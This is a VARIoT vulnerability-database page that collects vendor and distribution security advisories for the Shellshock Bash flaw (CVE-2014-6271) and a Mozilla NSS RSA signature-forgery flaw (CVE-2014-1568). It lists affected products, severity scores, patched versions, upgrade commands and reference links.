VARIoT IoT vulnerabilities database
| VAR-201409-1156 | CVE-2014-6271 |
GNU Bash shell executes commands in exported functions in environment variables
Related entries in the VARIoT exploits database: VAR-E-201409-0013, VAR-E-201409-0022, VAR-E-201409-0010, VAR-E-201409-0017, VAR-E-201409-0018, VAR-E-201409-0020, VAR-E-201409-0021, VAR-E-201410-0028, VAR-E-201410-0031, VAR-E-201410-0026, VAR-E-201410-0021, VAR-E-201410-0023, VAR-E-201409-0019, VAR-E-201410-0030, VAR-E-201410-0027, VAR-E-201410-0024, VAR-E-201410-0022, VAR-E-201409-0011, VAR-E-201409-0015, VAR-E-201410-0029, VAR-E-201409-0561, VAR-E-201409-0560, VAR-E-201409-0562, VAR-E-201409-0565, VAR-E-201409-0544, VAR-E-201409-0543, VAR-E-201409-0548, VAR-E-201409-0563, VAR-E-201409-0566, VAR-E-201409-0564, VAR-E-201409-0559, VAR-E-201409-0555, VAR-E-201409-0546, VAR-E-201409-0549, VAR-E-201409-0545, VAR-E-201409-0553, VAR-E-201409-0550, VAR-E-201409-0552, VAR-E-201409-0558, VAR-E-201409-0547 |
CVSS V2: 10.0 CVSS V3: 9.8 Severity: CRITICAL |
GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock." NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix. GNU Bash 4.3 and earlier contains a command injection vulnerability that may allow remote code execution.
An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
This vulnerability allows users that have been granted access to a shell
script to escalate privilege and execute unrestricted commands at the same
security level as the Bash script. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c04477872
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04477872
Version: 1
HPSBST03131 rev.1 - HP StoreOnce Backup Systems running Bash Shell, Remote
Code Execution
NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.
Release Date: 2014-10-16
Last Updated: 2014-10-16
Potential Security Impact: Remote unauthorized access
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
A potential security vulnerability has been identified with certain HP
StoreOnce Backup systems running Bash Shell.
NOTE: Versions of HP StoreOnce Backup software prior to 3.11.4 contain the
vulnerable version of Bash. However, HP is unaware of any method that would
allow this vulnerability to be exploited on HP StoreOnce Backup systems but
is providing an updated version of Bash Shell as a precaution.
References:
CVE-2014-7169
CVE-2014-6271
CVE-2014-7187
CVE-2014-7186
SSRT101749
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP StoreOnce Backup software versions 3.0.0 to 3.11.3.
Please refer to the RESOLUTION
section below for a list of impacted products.
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference Base Vector Base Score
CVE-2014-6271 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2014-7169 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2014-7186 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2014-7187 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has made the following updates available to resolve the vulnerability in
HP StoreOnce Backup systems running Bash Shell.
HP StoreOnce Backup version 3.11.4 for the following products:
Product SKU
Product Name
BB896A
HP StoreOnce 6500 Backup
EJ022A
HP StoreOnce B6200 Backup
BB903A
HP StoreOnce 4900 Backup
BB877A
HP StoreOnce 2700 Backup
BB878A
HP StoreOnce 4500 Backup
BB879A
HP StoreOnce 4700 Backup
HP StoreOnce 2610 iSCSI Backup system
BB852A
HP StoreOnce 2620 iSCSI Backup system
BB853A
HP StoreOnce 4210 iSCSI Backup system
BB854A
HP StoreOnce 4210 FC Backup system
BB855A
HP StoreOnce 4220 Backup system
BB856A
HP StoreOnce 4420 Backup system
BB857A
HP StoreOnce 4430 Backup system
TC458A/AAE
HP StoreOnce VSA 10 TB 3 Year Software
D4T77A/AAE
HP StoreOnce VSA 4 TB 3 Year Software
HISTORY
Version:1 (rev.1) - 16 October 2014 Initial release
Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX
Copyright 2014 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.19 (GNU/Linux)
iEYEARECAAYFAlQ/6r0ACgkQ4B86/C0qfVnzkwCgygurodeOPXxjTbO1oh0v+02r
KBEAoKSlGGRfldkZgl9wDQNdvo7hMFis
=4ysp
-----END PGP SIGNATURE-----
| VAR-201409-0340 | CVE-2014-1568 | Mozilla Network Security Services (NSS) fails to properly verify RSA signatures |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Mozilla Network Security Services (NSS) before 3.16.2.1, 3.16.x before 3.16.5, and 3.17.x before 3.17.1, as used in Mozilla Firefox before 32.0.3, Mozilla Firefox ESR 24.x before 24.8.1 and 31.x before 31.1.1, Mozilla Thunderbird before 24.8.1 and 31.x before 31.1.2, Mozilla SeaMonkey before 2.29.1, Google Chrome before 37.0.2062.124 on Windows and OS X, and Google Chrome OS before 37.0.2062.120, does not properly parse ASN.1 values in X.509 certificates, which makes it easier for remote attackers to spoof RSA signatures via a crafted certificate, aka a "signature malleability" issue. The Mozilla Network Security Services (NSS) library fails to properly verify RSA signatures due to incorrect ASN.1 parsing of DigestInfo. This vulnerability may allow an attacker to forge a RSA signature, such as a SSL certificate. The vulnerability is caused by the program not correctly parsing ASN.1 values ββββin X.509 certificates.
For the stable distribution (wheezy), this problem has been fixed in
version 2:3.14.5-1+deb7u2.
For the testing distribution (jessie), this problem has been fixed in
version 2:3.17.1.
For the unstable distribution (sid), this problem has been fixed in
version 2:3.17.1.
We recommend that you upgrade your nss packages. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201504-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
https://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: Mozilla Products: Multiple vulnerabilities
Date: April 07, 2015
Bugs: #489796, #491234, #493850, #500320, #505072, #509050,
#512896, #517876, #522020, #523652, #525474, #531408,
#536564, #541316, #544056
ID: 201504-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in Mozilla Firefox,
Thunderbird, and SeaMonkey, the worst of which may allow user-assisted
execution of arbitrary code.
Background
==========
Mozilla Firefox is an open-source web browser and Mozilla Thunderbird
an open-source email client, both from the Mozilla Project. The
SeaMonkey project is a community effort to deliver production-quality
releases of code derived from the application formerly known as the
=E2=80=98Mozilla Application Suite=E2=80=99.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 www-client/firefox < 31.5.3 >= 31.5.3
2 www-client/firefox-bin < 31.5.3 >= 31.5.3
3 mail-client/thunderbird < 31.5.0 >= 31.5.0
4 mail-client/thunderbird-bin
< 31.5.0 >= 31.5.0
5 www-client/seamonkey < 2.33.1 >= 2.33.1
6 www-client/seamonkey-bin
< 2.33.1 >= 2.33.1
7 dev-libs/nspr < 4.10.6 >= 4.10.6
-------------------------------------------------------------------
7 affected packages
Description
===========
Multiple vulnerabilities have been discovered in Firefox, Thunderbird,
and SeaMonkey. Please review the CVE identifiers referenced below for
details.
Impact
======
A remote attacker could entice a user to view a specially crafted web
page or email, possibly resulting in execution of arbitrary code or a
Denial of Service condition. Furthermore, a remote attacker may be able
to perform Man-in-the-Middle attacks, obtain sensitive information,
spoof the address bar, conduct clickjacking attacks, bypass security
restrictions and protection mechanisms, or have other unspecified
impact.
Workaround
==========
There are no known workarounds at this time.
Resolution
==========
All firefox users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=www-client/firefox-31.5.3"
All firefox-bin users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=www-client/firefox-bin-31.5.3"
All thunderbird users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=mail-client/thunderbird-31.5.0"=
All thunderbird-bin users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=mail-client/thunderbird-bin-31.5.0"
All seamonkey users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=www-client/seamonkey-2.33.1"
All seamonkey-bin users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=www-client/seamonkey-bin-2.33.1"
All nspr users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-libs/nspr-4.10.6"
References
==========
[ 1 ] CVE-2013-1741
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1741
[ 2 ] CVE-2013-2566
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2566
[ 3 ] CVE-2013-5590
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5590
[ 4 ] CVE-2013-5591
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5591
[ 5 ] CVE-2013-5592
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5592
[ 6 ] CVE-2013-5593
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5593
[ 7 ] CVE-2013-5595
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5595
[ 8 ] CVE-2013-5596
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5596
[ 9 ] CVE-2013-5597
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5597
[ 10 ] CVE-2013-5598
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5598
[ 11 ] CVE-2013-5599
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5599
[ 12 ] CVE-2013-5600
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5600
[ 13 ] CVE-2013-5601
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5601
[ 14 ] CVE-2013-5602
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5602
[ 15 ] CVE-2013-5603
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5603
[ 16 ] CVE-2013-5604
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5604
[ 17 ] CVE-2013-5605
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5605
[ 18 ] CVE-2013-5606
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5606
[ 19 ] CVE-2013-5607
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5607
[ 20 ] CVE-2013-5609
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5609
[ 21 ] CVE-2013-5610
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5610
[ 22 ] CVE-2013-5612
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5612
[ 23 ] CVE-2013-5613
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5613
[ 24 ] CVE-2013-5614
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5614
[ 25 ] CVE-2013-5615
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5615
[ 26 ] CVE-2013-5616
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5616
[ 27 ] CVE-2013-5618
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5618
[ 28 ] CVE-2013-5619
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5619
[ 29 ] CVE-2013-6671
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6671
[ 30 ] CVE-2013-6672
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6672
[ 31 ] CVE-2013-6673
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6673
[ 32 ] CVE-2014-1477
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1477
[ 33 ] CVE-2014-1478
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1478
[ 34 ] CVE-2014-1479
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1479
[ 35 ] CVE-2014-1480
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1480
[ 36 ] CVE-2014-1481
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1481
[ 37 ] CVE-2014-1482
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1482
[ 38 ] CVE-2014-1483
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1483
[ 39 ] CVE-2014-1485
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1485
[ 40 ] CVE-2014-1486
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1486
[ 41 ] CVE-2014-1487
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1487
[ 42 ] CVE-2014-1488
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1488
[ 43 ] CVE-2014-1489
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1489
[ 44 ] CVE-2014-1490
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1490
[ 45 ] CVE-2014-1491
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1491
[ 46 ] CVE-2014-1492
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1492
[ 47 ] CVE-2014-1493
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1493
[ 48 ] CVE-2014-1494
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1494
[ 49 ] CVE-2014-1496
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1496
[ 50 ] CVE-2014-1497
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1497
[ 51 ] CVE-2014-1498
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1498
[ 52 ] CVE-2014-1499
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1499
[ 53 ] CVE-2014-1500
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1500
[ 54 ] CVE-2014-1502
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1502
[ 55 ] CVE-2014-1505
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1505
[ 56 ] CVE-2014-1508
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1508
[ 57 ] CVE-2014-1509
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1509
[ 58 ] CVE-2014-1510
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1510
[ 59 ] CVE-2014-1511
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1511
[ 60 ] CVE-2014-1512
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1512
[ 61 ] CVE-2014-1513
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1513
[ 62 ] CVE-2014-1514
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1514
[ 63 ] CVE-2014-1518
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1518
[ 64 ] CVE-2014-1519
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1519
[ 65 ] CVE-2014-1520
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1520
[ 66 ] CVE-2014-1522
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1522
[ 67 ] CVE-2014-1523
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1523
[ 68 ] CVE-2014-1524
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1524
[ 69 ] CVE-2014-1525
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1525
[ 70 ] CVE-2014-1526
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1526
[ 71 ] CVE-2014-1529
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1529
[ 72 ] CVE-2014-1530
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1530
[ 73 ] CVE-2014-1531
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1531
[ 74 ] CVE-2014-1532
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1532
[ 75 ] CVE-2014-1533
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1533
[ 76 ] CVE-2014-1534
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1534
[ 77 ] CVE-2014-1536
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1536
[ 78 ] CVE-2014-1537
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1537
[ 79 ] CVE-2014-1538
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1538
[ 80 ] CVE-2014-1539
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1539
[ 81 ] CVE-2014-1540
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1540
[ 82 ] CVE-2014-1541
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1541
[ 83 ] CVE-2014-1542
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1542
[ 84 ] CVE-2014-1543
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1543
[ 85 ] CVE-2014-1544
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1544
[ 86 ] CVE-2014-1545
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1545
[ 87 ] CVE-2014-1547
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1547
[ 88 ] CVE-2014-1548
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1548
[ 89 ] CVE-2014-1549
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1549
[ 90 ] CVE-2014-1550
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1550
[ 91 ] CVE-2014-1551
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1551
[ 92 ] CVE-2014-1552
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1552
[ 93 ] CVE-2014-1553
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1553
[ 94 ] CVE-2014-1554
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1554
[ 95 ] CVE-2014-1555
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1555
[ 96 ] CVE-2014-1556
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1556
[ 97 ] CVE-2014-1557
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1557
[ 98 ] CVE-2014-1558
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1558
[ 99 ] CVE-2014-1559
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1559
[ 100 ] CVE-2014-1560
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1560
[ 101 ] CVE-2014-1561
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1561
[ 102 ] CVE-2014-1562
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1562
[ 103 ] CVE-2014-1563
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1563
[ 104 ] CVE-2014-1564
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1564
[ 105 ] CVE-2014-1565
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1565
[ 106 ] CVE-2014-1566
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1566
[ 107 ] CVE-2014-1567
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1567
[ 108 ] CVE-2014-1568
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1568
[ 109 ] CVE-2014-1574
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1574
[ 110 ] CVE-2014-1575
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1575
[ 111 ] CVE-2014-1576
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1576
[ 112 ] CVE-2014-1577
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1577
[ 113 ] CVE-2014-1578
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1578
[ 114 ] CVE-2014-1580
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1580
[ 115 ] CVE-2014-1581
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1581
[ 116 ] CVE-2014-1582
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1582
[ 117 ] CVE-2014-1583
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1583
[ 118 ] CVE-2014-1584
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1584
[ 119 ] CVE-2014-1585
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1585
[ 120 ] CVE-2014-1586
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1586
[ 121 ] CVE-2014-1587
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1587
[ 122 ] CVE-2014-1588
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1588
[ 123 ] CVE-2014-1589
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1589
[ 124 ] CVE-2014-1590
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1590
[ 125 ] CVE-2014-1591
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1591
[ 126 ] CVE-2014-1592
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1592
[ 127 ] CVE-2014-1593
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1593
[ 128 ] CVE-2014-1594
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1594
[ 129 ] CVE-2014-5369
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-5369
[ 130 ] CVE-2014-8631
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8631
[ 131 ] CVE-2014-8632
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8632
[ 132 ] CVE-2014-8634
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8634
[ 133 ] CVE-2014-8635
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8635
[ 134 ] CVE-2014-8636
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8636
[ 135 ] CVE-2014-8637
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8637
[ 136 ] CVE-2014-8638
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8638
[ 137 ] CVE-2014-8639
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8639
[ 138 ] CVE-2014-8640
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8640
[ 139 ] CVE-2014-8641
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8641
[ 140 ] CVE-2014-8642
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8642
[ 141 ] CVE-2015-0817
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0817
[ 142 ] CVE-2015-0818
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0818
[ 143 ] CVE-2015-0819
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0819
[ 144 ] CVE-2015-0820
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0820
[ 145 ] CVE-2015-0821
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0821
[ 146 ] CVE-2015-0822
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0822
[ 147 ] CVE-2015-0823
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0823
[ 148 ] CVE-2015-0824
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0824
[ 149 ] CVE-2015-0825
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0825
[ 150 ] CVE-2015-0826
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0826
[ 151 ] CVE-2015-0827
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0827
[ 152 ] CVE-2015-0828
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0828
[ 153 ] CVE-2015-0829
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0829
[ 154 ] CVE-2015-0830
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0830
[ 155 ] CVE-2015-0831
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0831
[ 156 ] CVE-2015-0832
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0832
[ 157 ] CVE-2015-0833
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0833
[ 158 ] CVE-2015-0834
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0834
[ 159 ] CVE-2015-0835
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0835
[ 160 ] CVE-2015-0836
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0836
[ 161 ] VE-2014-1504
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
https://security.gentoo.org/glsa/201504-01
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2015 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
_______________________________________________________________________
Mandriva Linux Security Advisory MDVSA-2015:059
http://www.mandriva.com/en/support/security/
_______________________________________________________________________
Package : nss
Date : March 13, 2015
Affected: Business Server 2.0
_______________________________________________________________________
Problem Description:
Multiple vulnerabilities has been found and corrected in the Mozilla
NSS and NSPR packages:
The cert_TestHostName function in lib/certdb/certdb.c in the
certificate-checking implementation in Mozilla Network Security
Services (NSS) before 3.16 accepts a wildcard character that is
embedded in an internationalized domain name's U-label, which might
allow man-in-the-middle attackers to spoof SSL servers via a crafted
certificate (CVE-2014-1492).
Use-after-free vulnerability in the CERT_DestroyCertificate function
in libnss3.so in Mozilla Network Security Services (NSS) 3.x, as used
in Firefox before 31.0, Firefox ESR 24.x before 24.7, and Thunderbird
before 24.7, allows remote attackers to execute arbitrary code via
vectors that trigger certain improper removal of an NSSCertificate
structure from a trust domain (CVE-2014-1544).
The definite_length_decoder function in lib/util/quickder.c in
Mozilla Network Security Services (NSS) before 3.16.2.4 and 3.17.x
before 3.17.3 does not ensure that the DER encoding of an ASN.1
length is properly formed, which allows remote attackers to conduct
data-smuggling attacks by using a long byte sequence for an encoding,
as demonstrated by the SEC_QuickDERDecodeItem function's improper
handling of an arbitrary-length encoding of 0x00 (CVE-2014-1569).
Mozilla Netscape Portable Runtime (NSPR) before 4.10.6 allows remote
attackers to execute arbitrary code or cause a denial of service
(out-of-bounds write) via vectors involving the sprintf and console
functions (CVE-2014-1545).
The sqlite3 packages have been upgraded to the 3.8.6 version due to
an prerequisite to nss-3.17.x.
Additionally the rootcerts package has also been updated to the
latest version as of 2014-11-17, which adds, removes, and distrusts
several certificates.
The updated packages provides a solution for these security issues.
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1492
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1544
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1568
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1569
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1545
https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSS/NSS_3.16_release_notes
https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSS/NSS_3.16.1_release_notes
https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSS/NSS_3.16.2_release_notes
